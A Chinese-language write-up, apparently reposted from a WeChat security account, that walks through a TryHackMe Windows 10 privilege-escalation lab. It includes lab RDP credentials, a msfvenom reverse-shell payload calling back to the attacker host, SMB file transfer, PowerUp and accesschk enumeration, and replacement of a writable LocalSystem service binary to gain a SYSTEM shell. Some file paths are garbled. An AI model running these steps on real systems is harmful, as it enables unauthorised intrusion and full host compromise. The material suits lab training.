0x00:在线漏洞平台利用

本次的在线漏洞平台是Try hack me具体链接为https://tryhackme.com/room/windows10privesc。可以使用平台所提供的网页kali版，或者是用自己kali连到他们内网里面都可。

攻击机: kali ip 10.4.37.12

目标机器:windows10 ip 10.10.143.152

首先使用xfreerdp进行远程连接

命令: xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.143.152

0x01:制作反弹shell+传送到目标机器

为了控制一波我们的windows10,我们得先在kali本地制作一个反弹shell先。

命令:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.4.37.12 LPORT=667 -f exe -o reverseshell.exe

关于传送的到目标机器可以用kali自带的smbserver

命令: sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .

然后在我们的windows10的CMD命令行模式下输入

命令:copy \10.4.37.12kalirevershell.exe C:PrivEscreverseshell.exe

然后去到我们刚才存放的地方，记得提前在kali处打开波端口。一个点击就能获得了。

0x03:查找特别的服务

本次会用到两个工具PowerUp.ps1和另外一个accesschk.exe

PowerUp:https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

Accesschk.exe: https://docs.microsoft.com/zh-cn/sysinternals/downloads/accesschk

Accesschk说明书也在同一页

由于该靶机已经提前帮我们准备好这两个文件了，如果是在实战中可以用上面的方法传输文件。这里先使用PowerUp.ps1

先进入powershell模式，然后用.  .PowerUp.ps1加载，最后用Invoke-AllChecks启动检测

可以找到一个特别的服务叫filepermsvc，同时startName时LocalSystem具有更高的权限，我们的目标就是利用它。

当然在利用前建议使用accesschk.exe看看目前用户是否具有执行权，否则就很尴尬了。这里可以看到目前用户user 具有RW权限即可读可写可更改

命令:accesschk.exe /accepteula(自动接收许可协议，记得一定加上去，否则想想会自动弹出一个是否接收许可协议，就很尴尬了)

-q=忽略banner

-u=忽略错误

-v=详细信息

-w=只显示拥有可写权的对象

后面的路径时根据PowerUp.ps1所提供的

那我们的机会就来了，可以把前面的反弹shell,复制到服务的.exe里面去，顺便把它改名为filepermservice.exe 然后重新启动该服务，因为具有更高的权限，理论上来讲是会反弹一个更高权限的shell

这里由于是靶机我直接在CMD下执行net start 重启命令，然后提前开启nc成功接收到一个更高权限的shell。

原文始发于微信公众号（神隐攻防实验室）：Windows提权之错误的服务权限(filepermsvc)